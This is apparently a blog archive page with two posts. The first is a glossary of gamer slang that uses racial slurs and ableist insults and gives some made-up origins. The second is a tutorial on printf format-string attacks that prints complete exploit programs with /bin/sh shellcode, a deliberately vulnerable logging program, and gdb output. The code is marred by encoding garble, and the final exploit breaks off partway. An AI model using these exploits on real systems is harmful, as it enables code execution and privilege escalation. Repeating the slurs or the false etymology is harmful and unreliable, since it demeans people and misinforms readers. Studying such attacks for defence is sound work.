Fo' shizzle my nizzle. This is traditional "street talk". American street talk comes mainly from the fact that the slums are mostly black, so the speech carries a black accent; rap is the musical form of this language. This phrase represents one street accent; it was originally invented by black brothers locked up in jail talking on the phone so that nobody could understand them, and spread widely through the Snoopy cartoon. Its feature is adding "-izzle" after every word to scramble the pronunciation. As for Fo' shizzle my nizzle, fully translated the sentence is "for sure, my niggar" (of course, my brother). Niggar is the black-accented variant of negger/negro, used only among black people addressing each other, meaning "fellow black friend". If a white person uses it, that amounts to racial discrimination.

Moron/Retarded. Everyone knows Silly? Everyone knows Stupid? Everyone knows Idiot? Same meaning. In that so-called "leaked Chinese 1.11 patch notes" thing last time, someone commented that everyone on 17173 is a moron. That is the meaning.

Epeen. Short for E-pennis, an electric XX, meaning you can no longer get it up and rely on electricity to do so. Online it means that, having lost an argument, you claim to be strong in real life, as some NGA users habitually do: "you're a LOSER in real life, I graduated from college / graduate school / have a job", or like me bragging at the start about my GRE 1380 and TOEFL 663. WoW players use it to mock PVE progress, calling it "PVEPEEN": what is there to brag about in FD'ing a boss? PVP is the true way.

Leech. Originally this referred to certain FTPs that let you download without uploading; later it came to mean throttling your upload bandwidth on BT and so on; in short, taking without giving. In WoW it mocks people who AFK to farm honor, or newbies in MC who turn up in green gear, contribute nothing and take loot. The funny thing is that in WoW, BFD (Blackfathom Deeps) has a drop called Leech pants, from the last boss. Its Chinese name is [吸血短裤], very apt...

1. epeen is a compound of e and peen; peen is a homophone spelling of pin, whose original meaning is a badge or pin, here roughly equivalent to reputation. epeen is basically e-reputation, roughly meaning one's standing online. Literally epeen is neutral, but in use it is pejorative; for instance on the realm forums, when someone brags about having beaten others in a duel or bg, the others may reply with something like "gratz you gains epeen+10", the pragmatic meaning being that in rl you gained nothing.

2. leech does not come from p2p downloading but from a d2 item property, "leech x% life/mana on attack", literally bloodsucking. Later in d2, when running a bus through the cow level, a low-level character tagging along to mooch experience was called a leech. Many wow players had played d2, so for similar mooching of experience/reputation/honor they naturally used leech too. Google it and you will see that leech in the sense of "mooching experience" mainly appears on sites related to Blizzard games.

3. Emoticons like >3, XD and :P come directly from American comics, and their earliest source is the smiley system of email culture. The emoticons of American comics are almost all verticons read sideways, while those in Japanese comics are mostly read upright. This has to do with the layout order of dialogue in the two kinds of comics. Emoticons generally run against the direction of the text to avoid confusion, so American comics with horizontal text mostly use verticons.

4. lame, freak, moron, retarded and so on all have their own specific meanings, not just Sister Furong, fuck, silly, stupid.

The original meaning of lame is crippled; by extension, someone who (being crippled) constantly relies on outside help. In the d2 era the word specifically meant someone in a legit pvp room who ignored the customary pvp rules and used banned items. For example, zealot duels on the d2 usw realm allowed no slow, no potions, no pd and no foh; whoever used them was a lamer. Calling someone lame on a wow forum means roughly the same thing, not necessarily that they share traits with charlatans like Sister Furong.

freak's origin in a certain famous science fiction novel is surely known to everyone. Its participle freaking is basically synonymous with fucking as an intensifier, but the word itself never loses its original meaning of "strange". On forums freak is often used attributively, e.g. describing an onxy raid where the dragon lady kept refusing to come down: "onxy's freak today she always refuses to land and yeild her due lewts before we wipe", whereas fuck never becomes an attributive.

moron and retarded are synonyms in their original sense, both meaning mentally deficient, but they differ slightly in forum use. moron emphasizes foolish or cowardly conduct: someone slaughtering Stranglethorn with a level 60 main, or calling lots of people for help after being killed once by the opposing faction in bs, or visiting 17173; that is a moron. retarded mainly says that someone's behavior is incomprehensible: someone posting a 41-point arcane talent build on the mage forum will be called retarded, but not a moron.



Asp 2006-10-31 23:35 Post a comment
]]>
*printf() format string security vulnerability analysis (2) (repost) http://m.shnenglu.com/asp/archive/2006/10/20/13922.html Asp Asp Fri, 20 Oct 2006 12:55:00 GMT http://m.shnenglu.com/asp/archive/2006/10/20/13922.html http://m.shnenglu.com/asp/comments/13922.html http://m.shnenglu.com/asp/archive/2006/10/20/13922.html#Feedback 0 http://m.shnenglu.com/asp/comments/commentRss/13922.html http://m.shnenglu.com/asp/services/trackbacks/13922.html
(continued)

So let's write a simple test program and take a look:

<- begin ->聽(tīng) exp.c

#include <stdlib.h>聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#include <unistd.h>聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define DEFAULT_OFFSET聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 0聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define DEFAULT_ALIGNMENT聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 2聽(tīng)聽(tīng)聽(tīng)聽(tīng) // 鎴戜滑浣跨敤涓や釜瀛楄妭鏉ヨ繘琛?瀵歸綈"
#define DEFAULT_RETLOC聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 0xbffff6dc聽(tīng)聽(tīng)聽(tīng)聽(tīng) // 瀛樻斁main()榪斿洖鍦板潃鐨勫湴鍧聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define DEFAULT_BUFFER_SIZE聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 512聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define DEFAULT_EGG_SIZE聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 2048聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define NOP聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 0x90聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
char shellcode[] =聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
聽(tīng) "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
聽(tīng) "\x80\xe8\xdc\xff\xff\xff/bin/sh";

聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
unsigned long get_esp(void) {聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng) __asm__("movl %esp,%eax");聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
}聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
main(int argc, char *argv[]) {聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) char *buff, *ptr, *egg;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) char *env[2];
聽(tīng) long shell_addr,retloc=DEFAULT_RETLOC;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) int offset=DEFAULT_OFFSET, align=DEFAULT_ALIGNMENT;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) int bsize=DEFAULT_BUFFER_SIZE, eggsize=DEFAULT_EGG_SIZE;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) int fmt_num=4, i;
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) if (argc > 1) sscanf(argv[1],"%x",&retloc); // 瀛樻斁main()榪斿洖鍦板潃鐨勫湴鍧聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) if (argc > 2) offset聽(tīng) = atoi(argv[2]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) if (argc > 3) align = atoi(argv[3]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) if (argc > 4) bsize聽(tīng)聽(tīng) = atoi(argv[4]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) if (argc > 5) eggsize = atoi(argv[5]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)

聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
  printf("Usages: %s <RETloc> <offset> <align> <buffsize> <eggsize> \n",argv[0]);
  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  printf("Using Ret location address: 0x%x\n", retloc);
  shell_addr = get_esp() + offset;    // compute the address our shellcode lands at
  printf("Using Shellcode address: 0x%x\n", shell_addr);

  ptr = buff;
  memset(buff,'A',4);

  i = align;
  buff[i]   =  retloc & 0x000000ff;   // store retloc into buff, least significant byte first
  buff[i+1] = (retloc & 0x0000ff00) >> 8;
  buff[i+2] = (retloc & 0x00ff0000) >> 16;
  buff[i+3] = (retloc & 0xff000000) >> 24;

  ptr = buff + i + 4;
  for(i = 0 ; i < 4 ; i++ )  // store %.10u%.10u%.10u%.10u
    {
        memcpy(ptr, "%.10u", 5);
        ptr += 5;
    }
  /* Store "%.SHELL_ADDRu%n". To make the total printed length equal shell_addr,
   * subtract the length of the four %.10u outputs (4*10) and the length of
   * "argv[1] = xxRETloc" (12+4), and use the result as the precision of the
   * fifth %u.
   */
  sprintf(ptr, "%%.%uu%%n", shell_addr - 4*10 - 16);

  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  memcpy(egg, "EGG=", 4);
  env[0] = egg ;
  env[1] = (char *)0 ;

  execle("./vul","vul",buff,NULL,env);
}  /* end of main */

<- end ->

Note: the pattern our program actually uses is:

AA|RETloc|%.10u%.10u%.10u%.10u%.(shell_addr-4*10-16)u|%n

The reason for choosing %.10u: when "%.nu" is used to print a value whose length is greater than n,
the full length is still printed rather than being truncated to n. Only when the value is shorter than n
is it padded with leading '0's so that the printed length reaches n. A four-byte unsigned integer is at
most 0xffffffff = 4294967295, which is 10 digits long, so %.10u guarantees an exact printed length
(always 10). The only thing left to determine is RETloc, the address of main()'s return address.
That is also simple:

[root@rh62 /root]# ./x 0x41414141
Usages: ./x <RETloc> <offset> <align> <buffsize> <eggsize>
Using Ret location address: 0x41414141
Using Shellcode address: 0xbffffb08

Segmentation fault (core dumped)
[root@rh62 /root]# gdb ./vul core
GNU gdb 19991004
<....>
#0  0x400622b7 in _IO_vfprintf (s=0xbfffedc4,
    format=0xbffff2d8 "argv[1] = AAAAAA%.10u%.10u%.10u%.10u%.3221224144u%n",
    ap=0xbffff2e8) at vfprintf.c:1212
1212    vfprintf.c: No such file or directory.
(gdb) bt
#0  0x400622b7 in _IO_vfprintf (s=0xbfffedc4,
    format=0xbffff2d8 "argv[1] = AAAAAA%.10u%.10u%.10u%.10u%.3221224144u%n",
    ap=0xbffff2e8) at vfprintf.c:1212
#1  0x40070716 in _IO_vsnprintf (
    string=0xbfffeec0 "argv[1] = AAAAAA00000000020000000001198649097705429783951094787133", maxlen=1023,
    format=0xbffff2d8 "argv[1] = AAAAAA%.10u%.10u%.10u%.10u%.3221224144u%n",
    args=0xbffff2d0) at vsnprintf.c:129
#2  0x80484de in log (level=1,
    fmt=0xbffff2d8 "argv[1] = AAAAAA%.10u%.10u%.10u%.10u%.3221224144u%n")
    at vul.c:13
#3  0x8048589 in main (argc=2, argv=0xbffff724) at vul.c:33
(gdb) i f 3  -----> look at main()'s stack frame
Stack frame at 0xbffff6d8:
eip = 0x8048589 in main (vul.c:33); saved eip 0x400349cb
caller of frame at 0xbffff2c0
source language c.
Arglist at 0xbffff6d8, args: argc=2, argv=0xbffff724
Locals at 0xbffff6d8, Previous frame's sp is 0x0
Saved registers:
  ebp at 0xbffff6d8, eip at 0xbffff6dc  ----> OK, the address holding eip is 0xbffff6dc
(gdb)

Good. Now that we know the address of RETloc, let's run our attack program and see:
[root@rh62 /root]# ./x 0xbffff6dc
Usages: ./x <RETloc> <offset> <align> <buffsize> <eggsize>
Using Ret location address: 0xbffff6dc
Using Shellcode address: 0xbffffb08

argv[1] = AA<4 raw RETloc bytes>%.10u%.10u%.10u%.10u%.3221224144u%n
Segmentation fault (core dumped)
[root@rh62 /root]# gdb ./vul core
<....>
#0  0x42 in ?? ()
(gdb) bt
#0  0x42 in ?? ()
(gdb) x/x 0xbffff6dc
0xbffff6dc:     0x00000042
(gdb)

Unfortunately, we do not get to see the exciting # prompt. It looks like a length of 0xbffffb08 cannot be
printed correctly; according to my tests, any length above 0x90000000 fails to print correctly, and the
exact reason is still to be investigated. Interested readers can analyze it themselves. To get a working
version, we modify vul.c and exp.c:

<- begin ->  vul1.c

#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <syslog.h>

#define BUFSIZE 1024

char egg[BUFSIZE];

void log(int level, char *fmt,...)
{
   char buf[BUFSIZE];
   va_list ap;

   va_start(ap, fmt);
   vsnprintf(buf, sizeof(buf)-1, fmt, ap);
   buf[BUFSIZE-1] = '\0';
   syslog(level, "[hmm]: %s", buf);
   va_end(ap);
}


int main(int argc, char **argv)
{

  char buf[BUFSIZE];
  int i,num;

  if(getenv("EGG")) {
     /* Copy the contents of the EGG environment variable into a global buffer;
      * that buffer starts at 0x80xxxxx, a length that can be printed correctly
      */
     strncpy(egg, getenv("EGG"), BUFSIZE-1);
     egg[BUFSIZE-1] = '\0';
  }
  num = argc ;
  if(argc > 1) {
    for ( i = 1 ; i < num ; i ++ ) {
            snprintf(buf, BUFSIZE -1 , "argv[%d] = %.200s", i, argv[i]);
            buf[BUFSIZE-1] = '\0';
            log(LOG_ALERT, buf);  // here is the problem: user data becomes the format string
            printf("argv[%d] = %s \n", i, argv[i]);
    }
  }
  return 0;
}

<- end ->

<- begin ->  exp1.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DEFAULT_ALIGNMENT    2
#define DEFAULT_RETLOC       0xbffffadc
#define DEFAULT_SHELLADDR    0x8049800   // our shellcode address lies in the heap/BSS segment
#define DEFAULT_BUFFER_SIZE  512
#define DEFAULT_EGG_SIZE     1024
#define NOP                  0x90

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  char *env[2];
  long retloc = DEFAULT_RETLOC;
  long shell_addr = DEFAULT_SHELLADDR;

  int align = DEFAULT_ALIGNMENT;
  int bsize = DEFAULT_BUFFER_SIZE, eggsize = DEFAULT_EGG_SIZE;
  int i;

  if (argc > 1) sscanf(argv[1],"%x",&retloc);
  if (argc > 2) sscanf(argv[2],"%x",&shell_addr);
  if (argc > 3) align = atoi(argv[3]);
  if (argc > 4) bsize   = atoi(argv[4]);
  if (argc > 5) eggsize = atoi(argv[5]);

  printf("Usages: %s <RETloc> <SHELL_addr> <align> <buffsize> <eggsize> \n",argv[0]);
  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  printf("Using RET location address: %#x\n", retloc);
  printf("Using Shellcode address: %#x\n", shell_addr);

  ptr = buff;
  memset(buff,'A',4);

  i = align;
  buff[i]   =  retloc & 0x000000ff;
  buff[i+1] = (retloc & 0x0000ff00) >> 8;
  buff[i+2] = (retloc & 0x00ff0000) >> 16;
  buff[i+3] = (retloc & 0xff000000) >> 24;

  ptr = buff + i + 4;
  for(i = 0 ; i < 4 ; i++ )
    {
        memcpy(ptr, "%.10u", 5);
        ptr += 5;
    }

  sprintf(ptr, "%%.%uu%%n", shell_addr - 4*10 - 16);

  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;

